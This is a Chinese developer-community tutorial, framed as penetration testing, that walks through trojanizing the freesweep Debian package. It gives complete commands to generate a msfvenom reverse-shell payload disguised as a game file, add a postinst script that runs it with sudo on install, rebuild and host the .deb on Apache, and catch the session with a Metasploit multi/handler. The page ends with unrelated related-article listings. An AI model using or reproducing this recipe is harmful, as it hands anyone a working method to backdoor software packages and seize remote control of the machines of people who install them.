AI 助理
备案控制台
开发者社区 安全 文章 正文

2022-渗透测试-制作恶意deb软件包来触发后门

2022-11-24 272
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 2022-渗透测试-制作恶意deb软件包来触发后门

目录

1.下载软件包

2.解压软件包

小知识1:kali更新或安装包的目录

小知识2:kali解压或安装操作

3.生成恶意代码到软件包源文件中

4.创建软件包信息目录

5.重新生成一个软件包

6 将deb提供下载

7 启动msfconsole

8.配置监听

10 目标机下载并安装带木马的deb软件

11.目标机安装软件

12 监控端获取到session

1.下载软件包

kali安装软件包

apt install 软件名称

image.gif

kali下载软件包

apt --download-only install 软件名称

image.gif

如图,下载软件包

apt --download-only install freesweep

image.gif

image.gif编辑

2.解压软件包

小知识1:kali更新或安装包的目录

kali系统更新或安装的包目录:/var/cache/apt/archives/

image.gif编辑

我们去查找刚刚下载的包,使用ls | grep free

image.gif编辑

将这个包移动到跟目录下,便于后面的操作 mv ./freesweep_1.0.2-1_amd64.deb ~/

image.gif编辑

image.gif编辑

小知识2:kali解压或安装操作

安装:dpkg -i

解压:dpkg -x

我们将软件包解压 

dpkg -x freesweep_1.0.2-1_amd64.deb free

image.gif

image.gif编辑

切换到free目录,查看文件列表

image.gif编辑

3.生成恶意代码到软件包源文件中

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
LHOST=192.168.0.109 LPORT=4444 -b "\x00" -i 10 -f elf -o
/root/free/usr/games/freesweep_sources

image.gif

扩展:生成软件包时无论是payload的和软件包信息都需要选择能够在目标操作系统上执行的。

4.创建软件包信息目录

创建软件包目录

mkdir free/DEBIAN

切换目录

cd free/DEBIAN

编辑

vim  /root/free/DEBIAN/control

Package:freesweep
Version:1.0.1-1
Section:Games and Amusement
Priority:optional
Architecture:amd64
Maintainer:Ubuntu MOTU Developers(ubuntu-motu@lists.ubuntu.com)
Description:a text-based minesweeper Freesweep is an implementation of the
popular minesweeper game,where one tries to find all the mines without igniting
any,based on hints given by the computer.Unlike most implementations of this
game,Freesweep works in any visual text display - in Linux console,in an
xterm,and in most text-based terminals currently in use.

image.gif

image.gif编辑

创建deb软件包,安装后脚本文件,来加载后门

tee /root/free/DEBIAN/postinst << 'EOF'
#!/bin/bash
sudo chmod 755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

image.gif

image.gif编辑

给postinst加执行权限

chmod 755 /root/free/DEBIAN/postinst

image.gif

image.gif编辑

5.重新生成一个软件包

dpkg-deb --build /root/free/

image.gif

6 将deb提供下载

systemctl start apache2
systemctl status apache2

image.gif

将free.deb复制到apache2 根目录

cp free.deb /var/www/html/

image.gif

7 启动msfconsole

8.配置监听

msf5 \> use exploit/multi/handler

image.gif

加载payload

msf5 exploit(multi/handler) \> set payload linux/x64/meterpreter/reverse_tcp

image.gif

设置监听主机

msf5 exploit(multi/handler) \> set lhost 192.168.31.53

image.gif

查看需要配置的参数

msf5 exploit(multi/handler) \> show options

image.gif

run

10 目标机下载并安装带木马的deb软件

wget http://192.168.0.109/free.deb

image.gif

11.目标机安装软件

dpkg -i free.deb

image.gif

12 监控端获取到session

文章标签:
监控
网络安全
安全
关键词:
测试软件包
小白渗透测试
目录
相关文章
不吃核桃
|
3月前
|
测试技术 语音技术
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
FunASR英文离线文件转写软件包问题之性能测试详细结果查看如何解决
不吃核桃
63 0
1387503158665997
|
2月前
|
Android开发
Android学习 —— 测试init.rc中的条件触发的处理顺序
Android学习 —— 测试init.rc中的条件触发的处理顺序
1387503158665997
32 4
不吃核桃
|
3月前
|
Docker 容器
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
FunASR离线文件转写软件包3.0问题之推理效率测试的配置如何解决
不吃核桃
35 0
众所周知
|
4月前
|
Java jenkins 持续交付
Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试
【7月更文挑战第1天】Jenkins是开源CI/CD工具,用于自动化Java项目构建、测试和部署。通过配置源码管理、构建触发器、执行Maven目标,实现代码提交即触发构建和测试。成功后,Jenkins执行部署任务,发布到服务器或云环境。使用Jenkins能提升效率,保证软件质量,加速上线,并需维护其稳定运行。
众所周知
128 0
红目香薰
|
5月前
|
SQL 存储 关系型数据库
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
MySQL的触发器创建与使用——使用Baidu Comate生成与触发测试完整过程
红目香薰
35 0
肥猪肥猪-17824
|
6月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
肥猪肥猪-17824
103 0
玄学酱
|
Ubuntu 测试技术 Linux
使用Snapcraft构建、测试并发布Snap软件包
玄学酱
3107 0
异步社区
|
Linux Apache 网络安全
《Nmap渗透测试指南》—第1章1.4节Linux通过RPM软件包安装Nmap
异步社区
2393 0
codetrend
|
6天前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
codetrend
34 3
zzy的aly
|
1月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
zzy的aly
57 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)

热门文章

最新文章

  • 1
    测试开启MySQL performance_schema后对性能的影响
  • 2
    测试1——v$open_cursor视图和session_cached_cursors参数的关系
  • 3
    VSTS 通过生成中未通过的测试自动创建 Bug 工作项
  • 4
    深入了解KUnit:Linux内核新一代单元测试工具(上)
  • 5
    测试思维之用户名的(Label)标签
  • 6
    前端,测试如何修改后端接口返回的响应数据
  • 7
    .Net单元测试业务实践
  • 8
    jmeter测试教程
  • 9
    AB(apache benchmark)压力测试
  • 10
    如何使ASP.NET MVC Controller易测试呢?
  • 1
    Doping:使用精心设计的合成数据测试和评估异常检测器的技术
    51
  • 2
    探索自动化测试在敏捷开发中的关键作用
    40
  • 3
    探索自动化测试框架的演进与实践
    36
  • 4
    《手把手教你》系列基础篇(九十五)-java+ selenium自动化测试-框架之设计篇-java实现自定义日志输出(详解教程)
    294
  • 5
    探索软件测试的未来:AI与自动化的融合之路
    65
  • 6
    我们假设要测试一个名为`http://example.com`的网站,并对其进行简单的GET请求性能测试。
    71
  • 7
    `pytest-httpserver`是一个pytest插件,它允许你在测试期间启动一个轻量级的HTTP服务器,并模拟HTTP请求和响应。
    142
  • 8
    `pytest-qt` 是一个用于在 Qt 应用程序中进行 GUI 测试的 pytest 插件。
    178
  • 9
    《手把手教你》系列基础篇(九十四)-java+ selenium自动化测试-框架设计基础-POM设计模式实现-下篇(详解教程)
    46
  • 10
    单元测试是软件开发中测试的最小单位
    65

    • 相关课程

    更多
  • MSE微服务测试最佳实践 - 自动化回归
  • 网络安全攻防 - Web渗透测试

    • 相关电子书

    更多
  • 移动互联网测试到质量的转变
  • 给ITer的技术实战进阶课-阿里CIO学院独家教材(四)
  • F2etest — 多浏览器兼容性测试整体解决方案

    • 相关实验场景

    更多
  • 1分钟代码漏洞自动检测
  • 快速上手并跑通AnalyticDB PostgreSQL版TPC-H测试
  • 灵活弹性的PolarDB Serverless确保数据业务持续在线
    • 下一篇
    阿里云OSS设置跨域访问